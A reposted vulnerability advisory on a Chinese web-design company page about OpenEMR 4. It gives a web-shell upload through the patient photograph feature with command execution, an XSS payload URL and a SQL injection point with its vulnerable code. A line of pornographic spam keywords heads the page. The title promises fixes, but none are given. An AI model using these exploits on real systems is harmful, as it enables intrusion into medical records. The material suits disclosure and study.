欧美激情网,国产欧美亚洲高清,欧美屁股xxxxx,欧美群妇大交群,欧美人与物ⅴideos另类,区二区三区在线 | 欧洲

知識(shí)學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時(shí)手機(jī):13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁(yè) > 知識(shí)學(xué)堂 > 網(wǎng)站建設(shè)知識(shí)
OpenEMR 4 多個(gè)缺陷及修復(fù)
更新時(shí)間:2011-12-26 | 發(fā)布人:本站 | 點(diǎn)擊率:410
OpenEMR 4 (Level @ Smash The Stack) 
 
 
 
Summary: Patient Photograph Arbitrary File Upload 
 
 
 
 
 
Initial Comment: 
 
 
 
1. Login with valid User/Pass 
 
 
 
2. Patient/Client -> Search/New Patient (search for anything) 
 
 
 
3. Click Documents -> Patient Photograph 
 
 
 
4. Upload Shell 
 
 
 
URL: http://www.badguest.cn/openemr/sites/SITENAME/documents/PATIENTID/shell..jpg?cmd=id 
 
 
 
 
 
EX: http://www.badguest.cn/oe/sites/default/documents/1/shell.php.jpg?cmd=id 
 
 
 
 
 
Output: uid=48(apache) gid=48(apache) groups=48(apache) 
 
 
 
  
 
 
 
first installed SITENAME = default 
 
 
 
first installed PATIENTID = 1 
 
  
 
 
 
OpenEMR 4 (Level @ Smash The Stack) 
 
 
 
XSS 
 
 
 
http://www.badguest.cn /oe/setup.php?site=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E 
 
 
 
 
 
OpenEMR 4 (Level @ Smash The Stack) 
 
 
 
Summary: validateUser.php SQL Injection 
 
 
 
Initial Comment: 
 
 
 
http://www.badguest.cn /oe/interface/login/validateUser.php?u=test' 
 
 
 
 
 
validateUser.php: 
 
 
 
$user = $_GET['u']; 
 
 
 
$authDB = sqlQuery("select password,length(password) as passlength from users where username = '$user'");